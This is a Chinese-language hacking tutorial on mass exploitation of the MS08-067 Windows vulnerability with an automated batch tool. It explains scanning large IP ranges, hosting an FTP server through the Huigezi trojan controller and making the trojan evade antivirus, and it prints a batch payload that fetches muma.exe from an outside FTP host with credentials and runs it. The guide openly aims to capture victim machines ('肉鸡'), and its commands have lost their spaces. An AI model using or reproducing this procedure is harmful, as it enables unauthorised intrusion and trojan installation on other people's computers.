MS08-67溢出：最强系统漏洞批量入侵

    MS08-67溢出可以说是今年爆出的最大漏洞之一，由于其覆盖范围广，并且用户的防范意识较差，再加上入侵比较简单，成为众多黑客首选的圈鸡工具！对于一般用户，我们今天推荐一些简单的批处理方法，来快速俘获网络肉鸡。

    一、MS08-67溢出全自动

    如果不懂CMD命令提示符窗口，不熟悉各种命令操作，那是不行的。CMD命令提示符窗口下的各种批处理命令，有时可以帮我们方便的完成各种复杂的手工操作。“MS08-67溢出全自动”就是一个利用批处理，实现自动化扫描漏洞主机、溢出与上传运行木马的工具。可以对上万个IP地址进行自动化扫描溢出攻击！

    1.设置IP段

    下载“MS08-67溢出全自动”工具，解压后打开其中的“TXT”和“TXT2”文件夹，在其中共有八个IP文件，分别名为“IP1.txt”、“IP2.txt”等。用记事本打开文件后，添加要扫描的地址段即可。每个文件中放一段IP即可，而且IP地址段范围不要太长，否则成功率不高，一般一段中包含5万个IP地址就够了。

    2.设置上传服务器

    用记事本打开“down2.txt”文件后，可以看到这是一段FTP自动上传的批处理命令代码。我们需要作的就是将其中的FTP服务器地址和登陆用户名及密码等修改，并保存修改后的文件。

    很多木马控制端程序都带有FTP服务功能，例如在灰鸽子木马中，打开FTP服务器工具窗口。设置FTP服务器的主目录为本地主机硬盘上的任意路径，设置“服务端口”为21，再设置一个用户名和密码。设置完毕后，点击“开启服务”按钮即可。注意自建FTP服务器时，必须有一个公网IP地址，否则无法从Internet上连接FTP服务器下载运行木马。

    开启FTP服务后，将“down2.txt”文件中的FTP服务器修改为自己的IP地址，并修改输入刚才设置的FTP服务器用户名及密码即可。

    3.设置服务端程序

    先对木马进行免杀等各种操作，并放在刚才设置为FTP服务器根目录的文件夹路径下。然后将“down2.txt”文件中的“你要下载的文件abc.exe”修改为木马文件名，并将另外的几个“abc.exe”也改为木马文件名，保存文件即可。最后修改好的“down2.txt”文件如下：

    echoopen220.172.228.177>cc1.dat

    echoxiaoyao>>cc1.dat

    echoxiaoyao>>cc1.dat

    echobinary>>cc1.dat

    echogetmuma.exe>>cc1.dat

    echobye>>cc1.dat

    ftp-s:cc1.dat

    muma.exe

    delcc1.dat

    muma.exe

    exit

    注意，最后一个“exit”字符串后面，一定要加上一个回车符，这样才能自动退出溢出上传状态。

【我要评论】

【大 中 小】 【打印】